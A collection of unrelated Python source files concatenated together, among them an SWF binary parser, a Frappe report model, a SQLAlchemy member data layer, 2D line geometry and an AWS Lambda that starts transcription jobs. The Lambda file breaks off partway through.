    section = first_capture(header + body + escape('$end'), input_string)
    assert section is not None
    return section
# Functions to check for errors in the input file
def check_defined_sections(input_string):
    """ verify all defined sections have been defined
    """
    pattern = escape('$') + capturing(one_or_more(NONNEWLINE))
    matches = all_captures(pattern, input_string)
    # Markers alternate: section header, 'end', section header, 'end', ...
    defined_sections = []
    for idx, match in enumerate(matches):
        if idx % 2 == 1:
            # every odd-positioned marker must close a section
            if match != 'end':
                raise ValueError
        else:
            defined_sections.append(match)
    # Every section the user wrote must be supported ...
    if any(section not in INPUT_SUPPORTED_SECTIONS
           for section in defined_sections):
        raise NotImplementedError
    # ... and every required section must be present.
    if any(section not in defined_sections
           for section in INPUT_REQUIRED_SECTIONS):
        raise NotImplementedError
def check_defined_lennard_jones_keywords(input_string):
    """ obtains the keywords defined in the input by the user
    """
    section_string = _get_lennard_jones_options_section(input_string)
    defined_keywords = _get_defined_keywords(section_string)
    # Every keyword the user wrote must be supported ...
    if any(keyword not in LJ_SUPPORTED_KEYWORDS
           for keyword in defined_keywords):
        raise NotImplementedError
    # ... and every required keyword must be present.
    if any(keyword not in defined_keywords
           for keyword in LJ_REQUIRED_KEYWORDS):
        raise NotImplementedError
def _get_defined_keywords(section_string):
""" gets a list of all the keywords defined in a section
"""
defined_keys = []
for line in section_string.splitlines():
if '=' in line:
tmp = line.strip().split('=')[0]
defined_keys.append(tmp.strip())
return defined_keys
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint
from frappe.model.document import Document
class Report(Document):
    def validate(self):
        """only administrator can save standard report"""
        # Default the module from the referenced DocType when not set.
        if not self.module:
            self.module = frappe.db.get_value("DocType", self.ref_doctype, "module")

        if not self.is_standard:
            self.is_standard = "No"
            # Administrators working with developer mode enabled create
            # standard (file-exported) reports by default.
            if frappe.session.user=="Administrator" and getattr(frappe.local.conf, 'developer_mode',0)==1:
                self.is_standard = "Yes"

        # Non-administrators may not save standard reports.
        if self.is_standard == "Yes" and frappe.session.user!="Administrator":
            frappe.msgprint(_("Only Administrator can save a standard report. Please rename and save."),
                raise_exception=True)

        # Query/Script reports execute code, so restrict who can create them.
        if self.report_type in ("Query Report", "Script Report") \
            and frappe.session.user!="Administrator":
            frappe.msgprint(_("Only Administrator allowed to create Query / Script Reports"),
                raise_exception=True)

    def on_update(self):
        self.export_doc()

    def export_doc(self):
        """Write the report to its module's files when it is standard and
        developer mode is on."""
        from frappe.modules.export_file import export_to_files
        if self.is_standard == 'Yes' and (frappe.local.conf.get('developer_mode') or 0) == 1:
            export_to_files(record_list=[['Report', self.name]],
                record_module=self.module)

    @Document.whitelist
    def toggle_disable(self, disable):
        # cint() normalizes the (possibly string) flag to 0/1.
        self.db_set("disabled", cint(disable))
|
import argparse
import numpy as np
from sklearn.preprocessing import normalize
from sklearn.neighbors import NearestNeighbors
from sklearn.metrics.pairwise import cosine_similarity
from transformers import RobertaTokenizer
import logging
from ..models.multnat_model import MultNatModel
def print_nn(pattern: np.array, nbrs: NearestNeighbors,
             tokenizer: RobertaTokenizer):
    """Print, column per neighbour rank, the nearest vocabulary tokens of
    each row in *pattern* together with their cosine similarity."""
    distances, indices = nbrs.kneighbors(X=pattern)
    rows = [[] for _ in range(indices.shape[1])]
    for dists, neighbors in zip(distances, indices):
        for rank, (dist, neighbor) in enumerate(zip(dists, neighbors)):
            # for unit vectors: cosine = 1 - (euclidean distance)^2 / 2
            cosine = 1 - dist * dist / 2
            if neighbor < len(tokenizer):
                token = tokenizer.convert_ids_to_tokens([neighbor])[0]
                rows[rank].append("{:25s} ({:.2f})".format(token, cosine))
            else:
                rows[rank].append("C")
    for row in rows:
        print("\t".join(row))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('checkpoint')
    parser.add_argument('num_patterns', type=int)
    parser.add_argument('num_tokens_per_pattern', type=int)
    parser.add_argument('--num-nn', default=5, type=int)
    args = parser.parse_args()
    logging.basicConfig(
        format='%(asctime)s %(levelname)-8s %(message)s',
        level=logging.INFO,
        datefmt='%Y-%m-%d %H:%M:%S'
    )
    logger = logging.getLogger(__name__)
    logger.info('Loading model')
    model = MultNatModel.load_from_checkpoint(args.checkpoint)
    logger.info('Done loading model')
    logger.info('Converting embeddings to numpy')
    emb = model.model.get_input_embeddings()
    # The pattern ("continuous") tokens are sliced off the tail of the
    # embedding matrix.
    contokens = emb.weight[-args.num_patterns *
                           args.num_tokens_per_pattern:].detach().numpy()
    # L2-normalize rows so euclidean distance relates directly to cosine
    # similarity (see print_nn).
    patterns = [
        normalize(contokens[s:s+args.num_tokens_per_pattern])
        for s in range(0, contokens.shape[0],
                       args.num_tokens_per_pattern)
    ]
    if len(patterns) != args.num_patterns:
        print("ERROR: Found {} patterns but expected {}".format(
            len(patterns), args.num_patterns))
        print("contokens:", contokens.shape)
        print("patterns[0]:", patterns[0].shape)
        # FIX: use SystemExit instead of the site-provided builtin exit(),
        # which is not guaranteed to exist outside interactive sessions.
        raise SystemExit(1)
    logger.info('Constructing ball tree of embeddings')
    nbrs = NearestNeighbors(
        n_neighbors=args.num_nn, algorithm='ball_tree'
    ).fit(normalize(emb.weight.detach().numpy()))
    logger.info('Start nearest neighbors search')
    for pat in patterns:
        print_nn(pat, nbrs, model.tokenizer)
        print('-----')
    similarities = cosine_similarity(contokens)
    with np.printoptions(precision=2, suppress=True):
        print(similarities)
|
# Implementar los metodos de la capa de datos de socios.
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from practico_05.ejercicio_01 import Base, Socio
class DatosSocio(object):
    """Data-access layer for Socio records backed by a SQLite database.

    Previously every method was an unimplemented stub (returning None/[]/
    False), which made pruebas() fail; the methods are now implemented with
    the session this class already constructs.
    """

    def __init__(self):
        engine = create_engine('sqlite:///socios.db')
        Base.metadata.bind = engine
        # Make sure the schema exists before handing out sessions.
        Base.metadata.create_all(engine)
        db_session = sessionmaker()
        db_session.bind = engine
        self.session = db_session()

    def buscar(self, id_socio):
        """
        Return the Socio instance with the given id, or None when absent.
        :rtype: Socio
        """
        return self.session.query(Socio).filter_by(id=id_socio).first()

    def buscar_dni(self, dni_socio):
        """
        Return the Socio instance with the given dni, or None when absent.
        :rtype: Socio
        """
        return self.session.query(Socio).filter_by(dni=dni_socio).first()

    def todos(self):
        """
        Return the list of all socios in the database.
        :rtype: list
        """
        return self.session.query(Socio).all()

    def borrar_todos(self):
        """
        Delete every socio from the database. Return True on success.
        :rtype: bool
        """
        self.session.query(Socio).delete()
        self.session.commit()
        return True

    def alta(self, socio):
        """
        Persist a new socio and return it (with its id populated).
        :type socio: Socio
        :rtype: Socio
        """
        self.session.add(socio)
        self.session.commit()
        return socio

    def baja(self, id_socio):
        """
        Delete the socio with the given id. Return True when a row was
        actually removed.
        :rtype: bool
        """
        deleted = self.session.query(Socio).filter_by(id=id_socio).delete()
        self.session.commit()
        return deleted > 0

    def modificacion(self, socio):
        """
        Persist the modified socio and return it.
        :type socio: Socio
        :rtype: Socio
        """
        self.session.merge(socio)
        self.session.commit()
        return socio
def pruebas():
    """Smoke tests for the DatosSocio data layer."""
    # create
    datos = DatosSocio()
    # start from an empty table so the counts asserted below are stable even
    # when socios.db persists between runs
    datos.borrar_todos()
    socio = datos.alta(Socio(dni=12345678, nombre='Juan', apellido='Perez'))
    assert socio.id > 0
    # delete
    assert datos.baja(socio.id) == True
    # find by id
    socio_2 = datos.alta(Socio(dni=12345679, nombre='Carlos', apellido='Perez'))
    assert datos.buscar(socio_2.id) == socio_2
    # find by dni — BUG FIX: this previously called buscar() with a dni (an
    # id lookup) and inserted socio_2 a second time, which also broke the
    # "todos == 2" count below
    assert datos.buscar_dni(socio_2.dni) == socio_2
    # update
    socio_3 = datos.alta(Socio(dni=12345680, nombre='Susana', apellido='Gimenez'))
    socio_3.nombre = 'Moria'
    socio_3.apellido = 'Casan'
    socio_3.dni = 13264587
    datos.modificacion(socio_3)
    socio_3_modificado = datos.buscar(socio_3.id)
    assert socio_3_modificado.id == socio_3.id
    assert socio_3_modificado.nombre == 'Moria'
    assert socio_3_modificado.apellido == 'Casan'
    assert socio_3_modificado.dni == 13264587
    # all
    assert len(datos.todos()) == 2
    # delete all
    datos.borrar_todos()
    assert len(datos.todos()) == 0


if __name__ == '__main__':
    pruebas()
|
def assign_fallback(config, default):
    """Return *config* unless it is None, in which case return *default*."""
    if config is None:
        return default
    return config
def assign_raise(config):
    """Return *config*, raising ValueError when it is None or an empty string.

    The ValueError now carries a message (it was previously raised bare).
    """
    if config is None or config == "":
        raise ValueError("configuration value is missing or empty")
    return config
|
"""A simple parser for SWF files."""
def byte_align(pos):
    """Round ``pos`` up to the next multiple of 8, returning ``pos`` itself
    when it is already a multiple. Raises ``ValueError`` if ``pos`` is
    negative.
    """
    if pos < 0:
        msg = "Expected positive integer, got {}"
        raise ValueError(msg.format(pos))
    remainder = pos % 8
    return pos if remainder == 0 else pos + 8 - remainder
def get_bit(data, pos):
    """Return the bit at bit-offset ``pos`` (MSB first within each byte) and
    the advanced position."""
    byte_index = pos // 8
    bit_index = pos % 8
    shift = 7 - bit_index
    return (data[byte_index] >> shift) & 1, pos + 1
def _check_byte_alignment(pos):
if pos % 8 != 0:
msg = "Position not byte aligned: {}"
raise ValueError(msg.format(pos))
def get_byte(data, pos):
    """Return the byte at the byte-aligned bit-offset ``pos`` and the
    advanced position."""
    _check_byte_alignment(pos)
    index = pos // 8
    return data[index], pos + 8
def parse_bytes(data, pos, num_bytes):
    """Return ``num_bytes`` bytes starting at the byte-aligned bit-offset
    ``pos`` and the advanced position."""
    _check_byte_alignment(pos)
    start = pos // 8
    return data[start:start + num_bytes], pos + 8 * num_bytes
def as_signed(num, num_bits):
    """Interpret the bit pattern of the unsigned integer ``num`` as a
    signed two's complement integer of width ``num_bits``.
    """
    sign_bit = 1 << (num_bits - 1)
    if num & sign_bit:
        return num - (sign_bit << 1)
    return num
def parse_ub(data, pos, num_bits):
    """Parse an unsigned big-endian bit field of ``num_bits`` bits."""
    value = 0
    for _ in range(num_bits):
        bit, pos = get_bit(data, pos)
        value = (value << 1) | bit
    return value, pos
def parse_sb(data, pos, num_bits):
    """Parse a signed (two's complement) big-endian bit field of
    ``num_bits`` bits."""
    unsigned, pos = parse_ub(data, pos, num_bits)
    return as_signed(unsigned, num_bits), pos
def parse_fb(data, pos, num_bits):
    """Parse a signed fixed-point bit field (value scaled by 2**-16)."""
    raw, pos = parse_sb(data, pos, num_bits)
    return raw / 65536, pos
def parse_uint(data, pos, num_bytes):
    """Parse a little-endian unsigned integer of ``num_bytes`` bytes, first
    advancing ``pos`` to the next byte boundary."""
    pos = byte_align(pos)
    value = 0
    for shift in range(0, 8 * num_bytes, 8):
        byte, pos = get_byte(data, pos)
        value |= byte << shift
    return value, pos
# Fixed-width little-endian unsigned integer readers (thin wrappers around
# parse_uint).
def parse_ui8(data, pos):
    return parse_uint(data, pos, 1)

def parse_ui16(data, pos):
    return parse_uint(data, pos, 2)

def parse_ui32(data, pos):
    return parse_uint(data, pos, 4)

def parse_ui64(data, pos):
    return parse_uint(data, pos, 8)
# Fixed-width little-endian signed integer readers: read unsigned, then
# reinterpret via two's complement.
def parse_si8(data, pos):
    ui8, pos = parse_ui8(data, pos)
    return as_signed(ui8, 8), pos

def parse_si16(data, pos):
    ui16, pos = parse_ui16(data, pos)
    return as_signed(ui16, 16), pos

def parse_si32(data, pos):
    ui32, pos = parse_ui32(data, pos)
    return as_signed(ui32, 32), pos

# Signed fixed-point readers: values scaled by 2**-8 and 2**-16 respectively.
def parse_fixed8(data, pos):
    si16, pos = parse_si16(data, pos)
    return si16 / (2 ** 8), pos

def parse_fixed16(data, pos):
    si32, pos = parse_si32(data, pos)
    return si32 / (2 ** 16), pos
class Rect:
    """Rectangle record with a 5-bit prefix giving the width of each of the
    four signed coordinate fields."""

    @staticmethod
    def parse(data, pos):
        rect = Rect()
        # first 5 bits: bit width of each coordinate field below
        field_bits, pos = parse_ub(data, pos, 5)
        rect.x_min, pos = parse_sb(data, pos, field_bits)
        rect.x_max, pos = parse_sb(data, pos, field_bits)
        rect.y_min, pos = parse_sb(data, pos, field_bits)
        rect.y_max, pos = parse_sb(data, pos, field_bits)
        return rect, pos

    def __repr__(self):
        return "Rect({}, {}, {}, {})".format(
            self.x_min,
            self.x_max,
            self.y_min,
            self.y_max)
class Header:
    """SWF file header: 3-character signature, version, file length and —
    for uncompressed files only — frame size, frame rate and frame count."""

    def __init__(self, signature):
        self.signature = signature
        actual_ending = signature[1:]
        expected_ending = 'WS'
        if actual_ending != expected_ending:
            msg = "Header signature is invalid; expected '{}', got '{}'"
            raise ValueError(msg.format(expected_ending, actual_ending))
        # The first signature character encodes the body compression scheme.
        if signature[0] == 'F':
            self.compression = None
        elif signature[0] == 'C':
            self.compression = 'zlib'
        elif signature[0] == 'Z':
            self.compression = 'lzma'
        else:
            msg = "Unknown compression type specified in header: '{}'"
            # BUG FIX: this referenced the undefined name 'header', so an
            # unknown compression byte raised NameError instead of ValueError.
            raise ValueError(msg.format(signature[0]))

    @staticmethod
    def parse(data, pos):
        sig_byte_1, pos = parse_ui8(data, pos)
        sig_byte_2, pos = parse_ui8(data, pos)
        sig_byte_3, pos = parse_ui8(data, pos)
        header = Header(chr(sig_byte_1) + chr(sig_byte_2) + chr(sig_byte_3))
        header.version, pos = parse_ui8(data, pos)
        header.file_length, pos = parse_ui32(data, pos)
        # The fields below are part of the compressed body, so they can only
        # be read directly when the file is uncompressed.
        if header.compression is None:
            header.frame_size, pos = Rect.parse(data, pos)
            header.frame_rate, pos = parse_fixed8(data, pos)
            header.frame_count, pos = parse_ui16(data, pos)
        return header, pos
class Tag:
    """Generic SWF tag record; subclasses register themselves by tag number."""
    # Maps tag type number -> Tag subclass (filled in by __init_subclass__).
    _types_by_num = {}

    def __init_subclass__(cls, /, num, **kwargs):
        # Subclasses declare their tag number via the class keyword, e.g.
        # ``class End(Tag, num=0)``.
        super().__init_subclass__(**kwargs)
        Tag._types_by_num[num] = cls

    def __init__(self, type_num, length):
        self.type_num = type_num  # numeric tag type from the tag header
        self.length = length      # payload length in bytes

    def _parse(self, data, pos):
        # Default payload handling: keep the raw bytes. Subclasses override
        # this to decode their specific structure.
        self.data, pos = parse_bytes(data, pos, self.length)

    @staticmethod
    def parse(data, pos):
        """Parse one tag (header + payload) starting at bit-offset ``pos``."""
        # The header packs type (upper 10 bits) and length (lower 6 bits)
        # into a single UI16.
        type_and_length, pos = parse_ui16(data, pos)
        type_num = type_and_length >> 6
        length = type_and_length & 0x3F
        # A short length of 0x3F signals a long-form 32-bit length field.
        if length == 0x3F:
            length, pos = parse_ui32(data, pos)
        try:
            tag_class = Tag._types_by_num[type_num]
            tag = tag_class(type_num, length)
        except KeyError:
            # Unknown tag number: fall back to the generic container.
            tag = Tag(type_num, length)
        tag._parse(data, pos)
        # Advance past the full payload regardless of how much _parse read.
        return tag, pos + 8 * length
# Tag types with no specialised parser; Tag._parse keeps their payload as
# raw bytes in ``self.data``.
class End(Tag, num=0): pass
class ShowFrame(Tag, num=1): pass
class DefineShape(Tag, num=2): pass
class PlaceObject(Tag, num=4): pass
class RemoveObject(Tag, num=5): pass
class DefineBits(Tag, num=6): pass
class DefineButton(Tag, num=7): pass
class JPEGTables(Tag, num=8): pass
class SetBackgroundColor(Tag, num=9): pass
class DefineFont(Tag, num=10): pass
class DefineText(Tag, num=11): pass
class DoAction(Tag, num=12): pass
class DefineFontInfo(Tag, num=13): pass
class DefineSound(Tag, num=14):
    """Sound-definition tag (type 14); decodes the audio header fields and
    keeps the remaining bytes as the raw encoded sound data."""
    # 4-bit codec field -> codec name.
    _formats = {
        0: 'uncompressed native-endian',
        1: 'ADPCM',
        2: 'MP3',
        3: 'uncompressed little-endian',
        4: 'Nellymoser 16 kHz',
        5: 'Nellymoser 8 kHz',
        6: 'Nellymoser',
        11: 'Speex',
    }
    # 2-bit sampling-rate field -> rate in Hz.
    _sampling_rates = {
        0: 5512.5,
        1: 11025,
        2: 22050,
        3: 44100,
    }
    # 1-bit sample-size field -> bits per sample.
    _bits_per_sample = {
        0: 8,
        1: 16,
    }
    # 1-bit channel field -> channel layout.
    _channels = {
        0: 'mono',
        1: 'stereo',
    }

    def _parse(self, data, pos):
        original_pos = pos
        self.id, pos = parse_ui16(data, pos)
        format_num, pos = parse_ub(data, pos, 4)
        self.format = DefineSound._formats[format_num]
        sampling_rate_num, pos = parse_ub(data, pos, 2)
        self.sampling_rate = DefineSound._sampling_rates[sampling_rate_num]
        bits_per_sample_num, pos = parse_ub(data, pos, 1)
        self.bits_per_sample = DefineSound._bits_per_sample[bits_per_sample_num]
        channels_num, pos = parse_ub(data, pos, 1)
        self.channels = DefineSound._channels[channels_num]
        self.sample_count, pos = parse_ui32(data, pos)
        # Whatever remains of the tag is the encoded audio stream.
        data_length = self.length - ((pos - original_pos) // 8)
        self.data, pos = parse_bytes(data, pos, data_length)
# Remaining tag types, all parsed as raw payloads by Tag._parse.
class StartSound(Tag, num=15): pass
class DefineButtonSound(Tag, num=17): pass
class SoundStreamHead(Tag, num=18): pass
class SoundStreamBlock(Tag, num=19): pass
class DefineBitsLossless(Tag, num=20): pass
class DefineBitsJPEG2(Tag, num=21): pass
class DefineShape2(Tag, num=22): pass
class DefineButtonCxform(Tag, num=23): pass
class Protect(Tag, num=24): pass
class PlaceObject2(Tag, num=26): pass
class RemoveObject2(Tag, num=28): pass
class DefineShape3(Tag, num=32): pass
class DefineText2(Tag, num=33): pass
class DefineButton2(Tag, num=34): pass
class DefineBitsJPEG3(Tag, num=35): pass
class DefineBitsLossless2(Tag, num=36): pass
class DefineEditText(Tag, num=37): pass
class DefineSprite(Tag, num=39): pass
class FrameLabel(Tag, num=43): pass
class SoundStreamHead2(Tag, num=45): pass
class DefineMorphShape(Tag, num=46): pass
class DefineFont2(Tag, num=48): pass
class ExportAssets(Tag, num=56): pass
class ImportAssets(Tag, num=57): pass
class EnableDebugger(Tag, num=58): pass
class DoInitAction(Tag, num=59): pass
class DefineVideoStream(Tag, num=60): pass
class VideoFrame(Tag, num=61): pass
class DefineFontInfo2(Tag, num=62): pass
class EnableDebugger2(Tag, num=64): pass
class ScriptLimits(Tag, num=65): pass
class SetTabIndex(Tag, num=66): pass
class FileAttributes(Tag, num=69): pass
class PlaceObject3(Tag, num=70): pass
class ImportAssets2(Tag, num=71): pass
class DefineFontAlignZones(Tag, num=73): pass
class CSMTextSettings(Tag, num=74): pass
class DefineFont3(Tag, num=75): pass
class SymbolClass(Tag, num=76): pass
class Metadata(Tag, num=77): pass
class DefineScalingGrid(Tag, num=78): pass
class DoABC(Tag, num=82): pass
class DefineShape4(Tag, num=83): pass
class DefineMorphShape2(Tag, num=84): pass
class DefineSceneAndFrameLabelData(Tag, num=86): pass
class DefineBinaryData(Tag, num=87): pass
class DefineFontName(Tag, num=88): pass
class StartSound2(Tag, num=89): pass
class DefineBitsJPEG4(Tag, num=90): pass
class DefineFont4(Tag, num=91): pass
class EnableTelemetry(Tag, num=93): pass
class SWFData:
    """Parsed SWF file: the header plus a flat list of tags.

    NOTE(review): compressed bodies ('CWS'/'ZWS') are not decompressed here,
    so ``tags`` stays empty for those files.
    """
    def __init__(self, data):
        pos = 0  # bit offset into data
        self.header, pos = Header.parse(data, pos)
        self.tags = []
        if self.header.compression is None:
            # pos counts bits, len(data) counts bytes
            while pos // 8 < len(data):
                tag, pos = Tag.parse(data, pos)
                self.tags.append(tag)
|
from .mixins import PreviewMixin
|
from __future__ import print_function
from eventlet import event as _event
class metaphore(object):
    """This is sort of an inverse semaphore: a counter that starts at 0 and
    waits only if nonzero. It's used to implement a "wait for all" scenario.
    >>> from eventlet import coros, spawn_n
    >>> count = coros.metaphore()
    >>> count.wait()
    >>> def decrementer(count, id):
    ...     print("{0} decrementing".format(id))
    ...     count.dec()
    ...
    >>> _ = spawn_n(decrementer, count, 'A')
    >>> _ = spawn_n(decrementer, count, 'B')
    >>> count.inc(2)
    >>> count.wait()
    A decrementing
    B decrementing
    """
    def __init__(self):
        # Number of outstanding dec() calls that wait() must wait for.
        self.counter = 0
        self.event = _event.Event()
        # send() right away, else we'd wait on the default 0 count!
        self.event.send()

    def inc(self, by=1):
        """Increment our counter. If this transitions the counter from zero to
        nonzero, make any subsequent :meth:`wait` call wait.
        """
        assert by > 0
        self.counter += by
        if self.counter == by:
            # If we just incremented self.counter by 'by', and the new count
            # equals 'by', then the old value of self.counter was 0.
            # Transitioning from 0 to a nonzero value means wait() must
            # actually wait.
            self.event.reset()

    def dec(self, by=1):
        """Decrement our counter. If this transitions the counter from nonzero
        to zero, a current or subsequent wait() call need no longer wait.
        """
        assert by > 0
        self.counter -= by
        if self.counter <= 0:
            # Don't leave self.counter < 0, that will screw things up in
            # future calls.
            self.counter = 0
            # Transitioning from nonzero to 0 means wait() need no longer wait.
            self.event.send()

    def wait(self):
        """Suspend the caller only if our count is nonzero. In that case,
        resume the caller once the count decrements to zero again.
        """
        self.event.wait()
|
#!/usr/bin/env python
#coding=utf-8
"""
counters.py: because we are using complex structures, we think
it is a good idea to have a file for the purpose.
"""
__author__ = "Francisco Maria Calisto"
__maintainer__ = "Francisco Maria Calisto"
__email__ = "francisco.calisto@tecnico.ulisboa.pt"
__license__ = "MIT"
__version__ = "1.0.0"
__status__ = "Development"
__copyright__ = "Copyright 2019, Instituto Superior Técnico (IST)"
__credits__ = [
"Bruno Oliveira",
"Carlos Santiago",
"Jacinto C. Nascimento",
"Pedro Miraldo",
"Nuno Nunes"
]
import os
import sys
from os import path
# The current folder path.
basePath = os.path.dirname(__file__)
# The path to the repository "src" folder.
joinRepoSrcPath = os.path.join(basePath, '..')
pathRepoSrcAbsPath = os.path.abspath(joinRepoSrcPath)
# Add the directory containing the module to
# the Python path (wants absolute paths).
sys.path.append(pathRepoSrcAbsPath)
# Appending countings path
consPath = os.path.join(joinRepoSrcPath, 'constants')
consAbsPath = os.path.abspath(consPath)
# FIX: the constants path was added twice (append then insert); adding it
# once at the front is sufficient for the import below.
sys.path.insert(0, consAbsPath)
# Importing available countings
from countings import *
import numpy as np
# 6x6 matrix built from the c_i_j values star-imported from `countings`.
# Presumably rows/columns index the same six categories — TODO confirm the
# axis semantics against the countings module.
acc001 = np.array([[c_0_0, c_0_1, c_0_2, c_0_3, c_0_4, c_0_5],
                   [c_1_0, c_1_1, c_1_2, c_1_3, c_1_4, c_1_5],
                   [c_2_0, c_2_1, c_2_2, c_2_3, c_2_4, c_2_5],
                   [c_3_0, c_3_1, c_3_2, c_3_3, c_3_4, c_3_5],
                   [c_4_0, c_4_1, c_4_2, c_4_3, c_4_4, c_4_5],
                   [c_5_0, c_5_1, c_5_2, c_5_3, c_5_4, c_5_5]])
# Companion 6x6 matrix of the p_i_j values from the same module.
acc002 = np.array([[p_0_0, p_0_1, p_0_2, p_0_3, p_0_4, p_0_5],
                   [p_1_0, p_1_1, p_1_2, p_1_3, p_1_4, p_1_5],
                   [p_2_0, p_2_1, p_2_2, p_2_3, p_2_4, p_2_5],
                   [p_3_0, p_3_1, p_3_2, p_3_3, p_3_4, p_3_5],
                   [p_4_0, p_4_1, p_4_2, p_4_3, p_4_4, p_4_5],
                   [p_5_0, p_5_1, p_5_2, p_5_3, p_5_4, p_5_5]])
# ==================== END File ==================== # |
# -*- coding: utf-8 -*-
## @package inversetoon.geometry.line
#
# Implementation of a 2D line.
# @author tody
# @date 2015/08/12
import numpy as np
from inversetoon.np.norm import normalizeVector
from inversetoon.geometry.bounding_box import BoundingBox
## Implementation of a 2D line.
class Line:
    ## Constructor
    #
    # @param p start point
    # @param q end point
    #
    # Line representation: (a, b, c) = (x1, y1, 1) $\times$ (x2, y2, 1)
    # - points on line: (a, b, c) $\cdot$ (x, y , 1) = 0
    # - line intersection: (x, y, w) = (a1, b1, c1) $\times$ (a2, b2, c2)
    def __init__(self, p, q):
        self._p = np.array(p)
        self._q = np.array(q)
        # Homogeneous line coefficients (a, b, c), normalized.
        peq = np.array([p[0], p[1], 1])
        qeq = np.array([q[0], q[1], 1])
        self._n = np.cross(peq, qeq)
        self._n = normalizeVector(self._n)
        # Unit direction vector from p to q.
        self._e = self._q - self._p
        self._e = normalizeVector(self._e)
        self._bb = BoundingBox([p, q])

    ## Return the positions of the line.
    def points(self):
        return np.array([self._p, self._q])

    ## Return the position of the parameter [0, 1].
    def pointAt(self, t):
        return self._p + t * self.length() * self._e

    ## Return the length of the line.
    def length(self):
        return np.linalg.norm(self._q - self._p)

    ## Find an intersected point with the given line.
    #  Returns None when the lines are (near-)parallel or the intersection
    #  lies outside either segment's bounding box.
    def intersect(self, l):
        ipeq = np.cross(self._n, l._n)
        # BUG FIX: the parallel-line test compared abs(w) against 0.000
        # (exactly zero), which can never be true, so parallel lines fell
        # through to a division by ~0 below. Use a small epsilon instead.
        if np.abs(ipeq[2]) < 1e-10:
            return None
        ipeq *= 1.0 / ipeq[2]
        ip = np.array([ipeq[0], ipeq[1]])
        if self._bb.contains(ip) and l._bb.contains(ip):
            return ip
        return None

    ## Returns the closest point on this line to the given point.
    def closestPoint(self, p):
        return self._closestPointVec(p)

    ## Returns the closest point on this line to the given point
    #  (algebraic formulation from the line coefficients).
    def _closestPointEq(self, p):
        a, b, c = self._n
        x0, y0 = p
        x = (b * (b * x0 - a * y0) - a * c) / (a * a + b * b)
        y = (a * (-b * x0 + a * y0) - b * c) / (a * a + b * b)
        return np.array([x, y])

    ## Returns the closest point on this line to the given point
    #  (projection of p onto the unit direction vector).
    def _closestPointVec(self, p):
        v = p - self._p
        return np.dot(v, self._e) * self._e + self._p

    ## Return the parameter of the closest point.
    def closestParam(self, p):
        v = p - self._p
        t = np.dot(v, self._e)
        return t / self.length()

    ## Return the distance from the given point to closest point on the line.
    def distanceToPoint(self, p):
        a, b, c = self._n
        x0, y0 = p
        return np.abs((a * x0 + b * y0 + c) / np.sqrt(a ** 2 + b ** 2))

    ## Plot line with matplot.
    def plotLine(self, plt):
        ps = self.points()
        plt.plot(ps[:, 0], ps[:, 1], "-")

    def plotVector(self, plt):
        hl = 0.02
        v = self._q - self._p
        v *= 1.0 - 2.0 * hl
        plt.arrow(self._p[0], self._p[1], v[0], v[1], head_width=0.5 * hl, head_length=hl)

    ## Plot closest point.
    #  (name kept as-is — "Closet" — for backward compatibility with callers)
    def plotClosetPoint(self, plt, p):
        p = np.array(p)
        cp = self.closestPoint(p)
        plt.plot(cp[0], cp[1], "o")
        plt.annotate('closest point: %s' % cp, xy=cp)
        Line(p, cp).plotLine(plt)
        Line(self._p, p).plotVector(plt)
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    from inversetoon.plot.window import showMaximize
    # Demo: intersect two segments and show the point on l1 closest to p.
    l1 = Line((0.0, 0.2), (1.0, 1.0))
    l2 = Line((0.0, 1.0), (1.0, 0.0))
    p = np.array((0.2, 0.6))
    ax = plt.subplot(111)
    ax.set_aspect('1.0')
    l1.plotLine(ax)
    l2.plotLine(ax)
    ip = l1.intersect(l2)
    t = l1.closestParam(ip)
    plt.title("Intersect at t, p: %s, %s" % (t, ip))
    ax.plot(ip[0], ip[1], "o")
    ax.plot(p[0], p[1], "o")
    l1.plotClosetPoint(plt, p)
    ax.set_aspect('1.0')
    showMaximize()
|
# This function is triggered by an S3 event when an object is created. It
# starts a transcription job with the media file, and sends an email notifying
# the user that the job has started.
import boto3
import uuid
import os
import re
import urllib.parse
# AWS clients are created at module import time so Lambda reuses them across
# invocations of the same container.
s3 = boto3.client('s3')
ses = boto3.client('ses')
transcribe = boto3.client('transcribe')
# Regional S3 endpoint host; used to build the media file URI for Transcribe.
s3_host = f"s3-{os.environ['AWS_REGION']}.amazonaws.com"
def get_media_format(path):
    """Return the Transcribe MediaFormat value for *path* by file extension.

    Unknown extensions fall back to 'mp3'.

    BUG FIX: the previous regexes ('.wav$', etc.) left the dot unescaped, so
    it matched any character — e.g. 'fooXwav' was classified as wav. A plain
    suffix check implements the intended behaviour.
    """
    extension_formats = {
        '.wav': 'wav',
        '.flac': 'flac',
        '.amr': 'amr',
        '.3ga': 'amr',
        '.mp3': 'mp3',
        '.mp4': 'mp4',
        '.m4a': 'mp4',
        '.oga': 'ogg',
        '.ogg': 'ogg',
        '.opus': 'ogg',
        '.webm': 'webm',
    }
    for extension, media_format in extension_formats.items():
        if path.endswith(extension):
            return media_format
    return 'mp3'
def get_s3_metadata(bucket, key):
    # Return only the user-defined metadata of the object (x-amz-meta-* keys,
    # lowercased by S3).
    return s3.head_object(Bucket=bucket, Key=key)['Metadata']
def lambda_handler(event, context):
    """S3-triggered entry point: start a transcription job for the uploaded
    media object and email the uploader that the job has started.

    Expects the object's S3 metadata to contain: email, channelidentification,
    languagecode and maxspeakerlabels.
    """
    # Generate a unique name for the job
    transcription_job_name = uuid.uuid4()
    bucket_name = event['Records'][0]['s3']['bucket']['name']
    # Object keys arrive URL-encoded in S3 events (spaces become '+').
    _object_key = event['Records'][0]['s3']['object']['key']
    object_key = urllib.parse.unquote_plus(_object_key)
    print(f"Starting transcription job: {transcription_job_name}")
    print(f"Object: {bucket_name}/{object_key}")
    media_metadata = get_s3_metadata(bucket_name, object_key)
    notification_email = media_metadata['email']
    channel_identification = media_metadata['channelidentification']
    language_code = media_metadata['languagecode']
    max_speaker_labels = int(media_metadata['maxspeakerlabels'])
    # Channel identification and speaker labels are mutually exclusive here.
    transcription_job_settings = {
        'ChannelIdentification': channel_identification == 'On',
        'ShowSpeakerLabels': channel_identification != 'On'
    }
    job_params = {
        'TranscriptionJobName': f"{transcription_job_name}",
        'MediaFormat': get_media_format(object_key),
        'Media': {
